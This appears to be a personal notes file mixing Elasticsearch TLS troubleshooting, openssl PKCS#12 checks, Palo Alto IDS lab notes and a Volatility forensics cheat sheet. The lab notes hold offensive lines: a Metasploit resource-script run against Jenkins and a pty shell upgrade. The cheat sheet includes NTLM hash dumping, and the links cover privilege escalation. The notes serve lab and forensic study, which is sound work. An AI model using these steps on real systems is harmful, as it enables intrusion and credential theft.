xpack.security.transport.ssl.key: /Users/khondhu/Desktop/elastic/workSpace/v624/elasticsearch-6.2.4/config/patwalia-node/patwalia-node.key
xpack.security.transport.ssl.certificate: /Users/khondhu/Desktop/elastic/workSpace/v624/elasticsearch-6.2.4/config/patwalia-node/patwalia-node.crt
xpack.security.transport.ssl.certificate_authorities: [ "/Users/khondhu/Desktop/elastic/workSpace/v624/elasticsearch-6.2.4/config/ca/ca.crt" ]
xpack.security.http.ssl.enabled: true
xpack.security.http.ssl.verification_mode: certificate 
xpack.security.http.ssl.key: /Users/khondhu/Desktop/elastic/workSpace/v624/elasticsearch-6.2.4/config/patwalia-node/patwalia-node.key
xpack.security.http.ssl.certificate: /Users/khondhu/Desktop/elastic/workSpace/v624/elasticsearch-6.2.4/config/patwalia-node/patwalia-node.crt
xpack.security.http.ssl.certificate_authorities: [ "/Users/khondhu/Desktop/elastic/workSpace/v624/elasticsearch-6.2.4/config/ca/ca.crt" ]

Over plain http (the server now expects TLS):

$ curl -s -XGET localhost:9201/_xpack/ssl/certificates?pretty
resp (Elasticsearch log):
[2018-07-10T15:16:13,901][WARN ][o.e.x.s.t.n.SecurityNetty4HttpServerTransport] [khondhu-monitoring] caught exception while handling client http traffic, closing connection [id: 0x3472219b, L:0.0.0.0/0.0.0.0:9201 ! R:/0:0:0:0:0:0:0:1:51494]
io.netty.handler.codec.DecoderException: io.netty.handler.ssl.NotSslRecordException: not an SSL/TLS record: 474554202f5f7

Over https without supplying the CA:

$ curl -s -XGET https://localhost:9201/_xpack/ssl/certificates?pretty
resp (Elasticsearch log):
[2018-07-10T15:20:13,300][WARN ][o.e.x.s.t.n.SecurityNetty4HttpServerTransport] [khondhu-monitoring] caught exception while handling client http traffic, closing connection [id: 0x7eb18cb1, L:0.0.0.0/0.0.0.0:9201 ! R:/0:0:0:0:0:0:0:1:51626]
io.netty.handler.codec.DecoderException: javax.net.ssl.SSLException: Received fatal alert: unknown_ca

With the CA:

$ curl --cacert config/ca/ca.crt -XGET https://localhost:9201/
{"error":{"root_cause":[{"type":"security_exception","reason":"missing authentication token for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}}],"type":"security_exception","reason":"missing authentication token for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}},"status":401}

With the CA and authentication:

$ curl --cacert config/ca/ca.crt -uelastic:changeme -XGET https://localhost:9201/
{
  "name" : "khondhu-monitoring",
  "cluster_name" : "khondhu",
  "cluster_uuid" : "Gf92RH6FSWqkc2X4vFqQ1A",
  "version" : {
    "number" : "6.2.4",
    "build_hash" : "ccec39f",
    "build_date" : "2018-04-12T20:37:28.497551Z",
    "build_snapshot" : false,
    "lucene_version" : "7.2.1",
    "minimum_wire_compatibility_version" : "5.6.0",
    "minimum_index_compatibility_version" : "5.0.0"
  },
  "tagline" : "You Know, for Search"
}

Add openssl clauses into the script

  • Do you want to verify the PEM cert against your CA. y/n?
    If "y"
    $ openssl verify -verbose -CAfile /ca/ca.crt instance.crt
    instance.crt: OK
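A minimal sketch of that clause in the same /bin/sh style as certCheckTool.sh; CA_FILE and CERT_FILE are placeholder paths to substitute with whatever the bundle-discovery steps above report:

```shell
#!/bin/sh
# Sketch of the proposed verify clause for certCheckTool.sh.
# CA_FILE and CERT_FILE are placeholder paths, not real locations.
CA_FILE=ca/ca.crt
CERT_FILE=instance.crt

printf "Do you want to verify the PEM cert against your CA? (y/n) "
read -r answer || answer=n
if [ "$answer" = "y" ]; then
  # Prints "<cert>: OK" when the cert chains to the given CA
  openssl verify -verbose -CAfile "$CA_FILE" "$CERT_FILE"
fi
```

Anything other than "y" (including just pressing Enter) skips the check, so the script still runs unattended.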

Check a PKCS#12 file (.pfx or .p12):
$ openssl pkcs12 -info -in elastic-certificates.p12

$ openssl pkcs12 -info -in config/elastic-certificates.p12 
Enter Import Password:
MAC Iteration 1024
MAC verified OK
PKCS7 Data
Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1024
Bag Attributes
    friendlyName: instance
    localKeyID: 54 69 6D 65 20 31 35 33 31 31 35 32 38 38 30 36 36 34 
Key Attributes: <No Attributes>
Enter PEM pass phrase:
PKCS7 Encrypted data: pbeWithSHA1And40BitRC2-CBC, Iteration 1024
Certificate bag
Bag Attributes
    friendlyName: instance
    localKeyID: 54 69 6D 65 20 31 35 33 31 31 35 32 38 38 30 36 36 34 
subject=/CN=instance
issuer=/CN=Elastic Certificate Tool Autogenerated CA
-----BEGIN CERTIFICATE-----
MI
8=
-----END CERTIFICATE-----
Certificate bag
Bag Attributes
    friendlyName: ca
    2.16.840.1.113894.746875.1.1: <Unsupported tag 6>
subject=/CN=Elastic Certificate Tool Autogenerated CA
issuer=/CN=Elastic Certificate Tool Autogenerated CA
-----BEGIN CERTIFICATE-----
MI
Y=
-----END CERTIFICATE-----

The key part here is the OID 2.16.840.1.113894.746875.1.1. This is Oracle's OID for a trusted CA entry in a PKCS#12.

We assume that the PKCS#12 contains the certificate chain. That's usually true, but not always.
If the openssl pkcs12 -info command outputs multiple -----BEGIN CERTIFICATE----- blocks, then the PKCS#12 contains the full chain and this should all work fine. If it has only a single certificate block, then the customer will need to get their CA cert from elsewhere.
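That check can be scripted by counting the certificate blocks; a sketch, where BUNDLE and PASS are placeholder values for the bundle path and its import password:

```shell
#!/bin/sh
# Count -----BEGIN CERTIFICATE----- blocks in a PKCS#12 bundle to see whether
# the full chain is present. BUNDLE and PASS are placeholders.
BUNDLE=elastic-certificates.p12
PASS=changeme

count=$(openssl pkcs12 -info -in "$BUNDLE" -nokeys -passin "pass:$PASS" 2>/dev/null \
  | grep -c -- '-----BEGIN CERTIFICATE-----') || count=0
if [ "$count" -gt 1 ]; then
  echo "full chain present ($count certificates)"
else
  echo "single certificate only - the CA cert must come from elsewhere"
fi
```

-nokeys skips the private key (and its PEM pass phrase prompt) so only the certificate bags are printed and counted.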

noSuchThingAsCheats

main:
  name: 'moshi-moshi'
  whitelist:
    - 'SSIDNameHere'
  plugins:
    grid:
      enabled: true
      report: true
      exclude:
        - 'SSIDNameHere'

ui:
  display:
    enabled: true
    type: 'waveshare_2'
    color: 'black'

Google Cloud Palo Alto IDS lab notes

//ephemeral IPs, FYSA :)
GSP748 - Palo Alto Networks: Advanced Threat Detection

Compute Engine > Juice-shop > ext IP
//Juice-shop

// PAN VM-Series
addr.src in {*your IP address*}
82.23.254.71
addr.src in {82.23.254.71}
34.72.30.36/#/score-board

//JENKINS
ip:8080
//KALI
msfconsole -r jenkins.rc
python -c 'import pty; pty.spawn("/bin/bash")'

addr.src in {82.23.254.71}
( severity neq informational )
( addr.dst in 192.168.11.3 ) or ( addr.dst in 192.168.11.4 )
(( addr.dst in 192.168.11.3 ) or ( addr.dst in 192.168.11.4 ) ) and ( severity neq informational )
( addr.src in 192.168.11.3 )

welcome2twenty20

Memory Analysis Tools
Volatility (Windows/Linux/Mac)
https://github.com/volatilityfoundation/volatility
Mandiant Redline (Windows)
http://www.mandiant.com/resources/download/redline
VolaFox (Mac OS / BSD)
https://github.com/n0fate/volafox

Volatility Basics
The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples.

Location in Kali Linux
/usr/share/volatility/vol.py
Examples
Show options and supported plugins
$ vol.py -h
Show usage for a specific plugin
$ vol.py <plugin> -h
Identify System Profile
$ vol.py -f mem.img imageinfo

Identify Rogue Process
High level view of running processes
$ vol.py pslist -f mem.img
Scan memory for EPROCESS Blocks
$ vol.py psscan -f mem.img
Display parent-process relationships
$ vol.py pstree -f mem.img
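pslist walks the kernel's linked process list while psscan carves EPROCESS blocks out of raw memory, so diffing the two PID sets is a quick way to surface hidden processes. A sketch, assuming vol.py on the PATH, mem.img in the current directory, and a profile already identified via imageinfo (Win7SP1x86 here is a placeholder):

```shell
#!/bin/sh
# Compare PID sets from pslist and psscan; PIDs seen only by psscan may be
# hidden (e.g. DKOM-unlinked). mem.img and PROFILE are assumptions.
PROFILE=Win7SP1x86

vol.py -f mem.img --profile="$PROFILE" pslist 2>/dev/null \
  | awk 'NR>2 {print $3}' | sort -u > /tmp/pslist.pids
vol.py -f mem.img --profile="$PROFILE" psscan 2>/dev/null \
  | awk 'NR>2 {print $3}' | sort -u > /tmp/psscan.pids

# comm -13 prints lines unique to the second file: psscan-only PIDs
comm -13 /tmp/pslist.pids /tmp/psscan.pids
```

An empty result is the healthy case; anything printed deserves a closer look with pstree and malfind.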

Look for Evidence of Code Injection
malfind
-p show information only for specific PIDs
-o Provide physical offset if single process to scan
--dump-dir Directory to save memory section
$ vol.py malfind --dump-dir ./output_dir
ldrmodules
$ vol.py ldrmodules -p 868 -v

Check for Signs of a Rootkit
Examples
Find Hidden processes using cross-view
$ vol.py psxview
Scan Memory for loaded, unloaded and Unlinked drivers
$ vol.py modscan
Find API/DLL Function hooks
$ vol.py apihooks
$ vol.py apihooks -p 868 (Specific PID)
$ vol.py apihooks -Q (Only Critical Processes)
Hooks in System Service Descriptor Table
$ vol.py ssdt | egrep -v '(ntoskrnl|win32k)'
Display Interrupt Descriptor Table
$ vol.py idt
Identify I/O Request Packet (IRP) hooks
$ vol.py driverirp -r tcpip

Analyze Process DLLs and Handles
Examples
List of loaded dlls by process
$ vol.py dlllist -p 4,868
Print process security identifiers
$ vol.py getsids -p 868
List of open handles for each process
-t Display handles of a certain type
{Process, Thread, Key, Event, File, Mutant, Token, Port}
$ vol.py handles -p 58 -t Process,Mutant
Scan memory for FILE_OBJECT handles
$ vol.py filescan
Scan for Windows Service Information
$ vol.py svcscan

Dump Suspicious Processes and Drivers
Examples
Extract DLLs from Specific Processes
dlldump
-p Dump DLLs only for specific PIDs
-b Dump DLLs from process at physical memory offset
-r Dump DLLs matching REGEX name
--dump-dir Directory to save extracted files
$ vol.py dlldump --dump-dir ./output -r metsrv

Extract kernel drivers
moddump
-o Dump driver using offset address (from modscan)
-r Dump drivers matching REGEX name
--dump-dir Directory to save extracted files
$ vol.py moddump --dump-dir ./output -r gaopdx

Dump process to executable sample
procmemdump
-p Dump only specific PIDs
-o Specify process by physical memory offset
--dump-dir Directory to save extracted files
$ vol.py procmemdump --dump-dir ./output -p 868

Dump every memory section into a file
memdump
-p Dump memory sections from these PIDs
--dump-dir Directory to save extracted files
$ vol.py memdump --dump-dir ./output -p 868

Review Network Artifacts
Examples
[XP] List of open TCP connections
$ vol.py connections
[XP] ID TCP connections, including closed
$ vol.py connscan
[XP] Print listening sockets (any protocol)
$ vol.py sockets
[XP] ID sockets, including closed/unlinked
$ vol.py sockscan
[Win7] Scan for connections and sockets
$ vol.py netscan

Memory Acquisition
Windows Operating Systems
Win32dd (x86) / Win64dd (x64)
Example
c:> win32dd.exe /f E:\memory.img
MemoryDD.bat
Example
c:> MemoryDD.bat --output E:
Volatility WinPmem
Options
-  Output to standard out
-l Load driver for live memory analysis

Converting Hibernation Files and Crash Dumps
Volatility imagecopy
Options
-f Name of Source File
-O Output file Name
--profile Source OS from imageinfo

Examples
$ vol.py imagecopy -f hiberfil.sys -O hiber.img --profile=Win7SP1x64
$ vol.py imagecopy -f Memory.dmp -O memdmp.img --profile=Win7SP1x64

Memory Artifact Timelining
The Volatility Timeliner plugin parses time-stamped objects found in memory images. Output is sorted by:
Process creation time
Thread creation time
Driver compile time
DLL / EXE compile time
Network socket creation time
Memory resident registry key last write time
Memory resident event log entry creation time
timeliner
--output-file Optional file to write output (v2.1)
--output=body bodyfile format for mactime (v2.3)
$ vol.py -f mem.img timeliner --output-file out.csv --profile=Win7SP1x86

Registry Analysis Volatility Plugins
hivelist - Find and list available registry hives
$ vol.py hivelist
hivedump - Print all keys and subkeys in a hive
-o Offset of registry hive to dump (virtual offset)
$ vol.py hivedump -o 0xe1a14b60
printkey - Output a registry key, subkeys, and values
-K "Registry key path"
$ vol.py printkey -K "Software\Microsoft\Windows\CurrentVersion\Run"
userassist - Find and parse userassist key values
$ vol.py userassist
hashdump - Dump user NTLM and Lanman hashes
-y Virtual offset of SYSTEM registry hive (from hivelist)
-s Virtual offset of SAM registry hive (from hivelist)
$ vol.py hashdump -y 0x8781c008 -s 0x87f6b9c8
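The two hive offsets can be pulled out of hivelist automatically instead of copied by hand: hivelist prints the hive path in its last column, so matching on the file name at the end of the line yields the virtual offset in the first column. A sketch, where vol.py and mem.img are assumptions:

```shell
#!/bin/sh
# Feed hivelist's SYSTEM and SAM virtual offsets straight into hashdump.
# mem.img is a placeholder; hive paths end in SYSTEM and SAM respectively.
SYS=$(vol.py -f mem.img hivelist 2>/dev/null | awk '/SYSTEM$/ {print $1; exit}')
SAM=$(vol.py -f mem.img hivelist 2>/dev/null | awk '/SAM$/ {print $1; exit}')

if [ -n "$SYS" ] && [ -n "$SAM" ]; then
  vol.py -f mem.img hashdump -y "$SYS" -s "$SAM"
else
  echo "could not locate SYSTEM/SAM hive offsets" >&2
fi
```

The guard keeps the script from calling hashdump with empty offsets when hivelist finds nothing.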

AUTOPSY MAC INSTALL:
https://github.com/sleuthkit/autopsy
https://github.com/sleuthkit/autopsy/blob/develop/Running_Linux_OSX.txt

Linux-Privilege-Escalation:
https://github.com/frizb/Linux-Privilege-Escalation

Upgrading Simple Shells to Fully Interactive TTYs:
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

Post-Exploitation Without A TTY:
http://pentestmonkey.net/blog/post-exploitation-without-a-tty

Linpeas:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
